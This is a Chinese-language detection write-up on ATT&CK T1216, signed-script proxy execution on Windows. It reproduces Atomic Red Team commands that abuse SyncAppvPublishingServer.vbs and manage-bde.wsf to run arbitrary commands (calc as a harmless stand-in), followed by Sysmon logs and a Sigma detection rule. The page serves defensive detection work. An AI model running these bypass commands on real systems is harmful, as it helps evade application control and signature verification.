跳转至

T1216-win-签名脚本代理执行

来自ATT&CK的描述

攻击者可能使用用可信证书签署的脚本来代理执行恶意文件。在Windows安装中默认的几个微软签名脚本可以用来代理执行其他文件。这种行为可能被攻击者滥用来执行恶意文件,从而绕过系统的应用控制和签名验证。

测试案例

测试1 SyncAppvPublishingServer Signed Script PowerShell Command Execution

执行已签名的SyncAppvPublishingServer脚本,并带有执行任意PowerShell命令的选项。执行后,calc.exe将被启动。

攻击命令,无需权限提升,Windows命令行执行即可。 

C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"

command_to_execute:Start-Process calc

测试2 manage-bde.wsf Signed Script Command Execution

manage-bde.wsf 签名脚本命令执行,并带有执行任意命令的选项。

set comspec=#{command_to_execute}
cscript %windir%\System32\manage-bde.wsf
command_to_execute:%windir%\System32\calc.exe 清理命令 
set comspec=%windir%\System32\cmd.exe

检测日志

Windows 安全日志、Sysmon日志

测试复现

测试1 SyncAppvPublishingServer Signed Script PowerShell Command Execution

C:\Users\Administrator.ZHULI>C:\windows\system32\SyncAppvPublishingServer.vbs "\n;Start-Process calc"

测试2 manage-bde.wsf Signed Script Command Execution

set comspec=%windir%\System32\calc.exe
cscript %windir%\System32\manage-bde.wsf
未复现成功,缺少manage-bde.wsf文件,下载了github上的文件,但是提示异常。 
C:\Users\Administrator.ZHULI>cscript %windir%\System32\manage-bde.wsf
Microsoft (R) Windows Script Host Version 5.812
版权所有(C) Microsoft Corporation。保留所有权利。

C:\Windows\System32\manage-bde.wsf(19, 38) Windows Script Host: 无效实体引用
manage-bde.wsf文件参考地址:https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712

测试留痕

测试1 SyncAppvPublishingServer Signed Script PowerShell Command Execution

Process Create:

RuleName: technique_id=T1059,technique_name=Command-Line Interface

UtcTime: 2022-01-11 08:32:36.816

ProcessGuid: {78c84c47-40a4-61dd-5325-000000000800}

ProcessId: 5680

Image: C:\Windows\System32\wscript.exe

FileVersion: 5.812.10240.16384

Description: Microsoft 

Product: Microsoft ® Windows Script Host

Company: Microsoft Corporation

OriginalFileName: wscript.exe

CommandLine: "C:\Windows\System32\WScript.exe" "C:\windows\system32\SyncAppvPublishingServer.vbs" "\n;Start-Process calc"
CurrentDirectory: C:\Users\Administrator.ZHULI\

User: ZHULI\Administrator

LogonGuid: {78c84c47-f665-61db-95da-440100000000}

LogonId: 0x144DA95

TerminalSessionId: 3

IntegrityLevel: High

Hashes: SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C

ParentProcessGuid: {78c84c47-3fbf-61dd-2225-000000000800}

ParentProcessId: 1120

ParentImage: C:\Windows\System32\cmd.exe

ParentCommandLine: "C:\Windows\system32\cmd.exe" 

ParentUser: ZHULI\Administrator

Process Create:

RuleName: technique_id=T1086,technique_name=PowerShell

UtcTime: 2022-01-11 08:32:36.965

ProcessGuid: {78c84c47-40a4-61dd-5425-000000000800}

ProcessId: 5412

Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

FileVersion: 10.0.17763.1 (WinBuild.160101.0800)

Description: Windows PowerShell

Product: Microsoft® Operating System

Company: Microsoft Corporation

OriginalFileName: PowerShell.EXE

CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer \n;Start-Process calc}

CurrentDirectory: C:\Users\Administrator.ZHULI\

User: ZHULI\Administrator

LogonGuid: {78c84c47-f665-61db-95da-440100000000}

LogonId: 0x144DA95

TerminalSessionId: 3

IntegrityLevel: High

Hashes: SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F

ParentProcessGuid: {78c84c47-40a4-61dd-5325-000000000800}

ParentProcessId: 5680

ParentImage: C:\Windows\System32\wscript.exe

ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\windows\system32\SyncAppvPublishingServer.vbs" "\n;Start-Process calc"

ParentUser: ZHULI\Administrator

检测规则/思路

Sigma规则

title: 使用SyncAppvPublishingServe脚本绕过检测
status: experimental
author: 12306Br0
date: 2022/01/11
references:
    - attack.t1216
logsource:
    product: windows
    service: sysmon
detection:
    selection:
        EventID: 1 #sysmon日志,进程创建
        CommandLine: 
              - '*\SyncAppvPublishingServer.vbs' #进程命令行
              - 'Start-Process'
    condition: selection
level: low

建议

监视脚本进程,例如cscript,以及脚本的命令行参数,例如可用于代理恶意文件执行的PubPrn.vbs。

相关TIP

[[T1216-001-win-签名脚本代理执行-PubPrn]]

参考推荐

MITRE-ATT&CK-T1216

https://attack.mitre.org/techniques/T1216/

Atomic-red-team-T1216

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md

manage-bde.wsf文件参考地址

https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712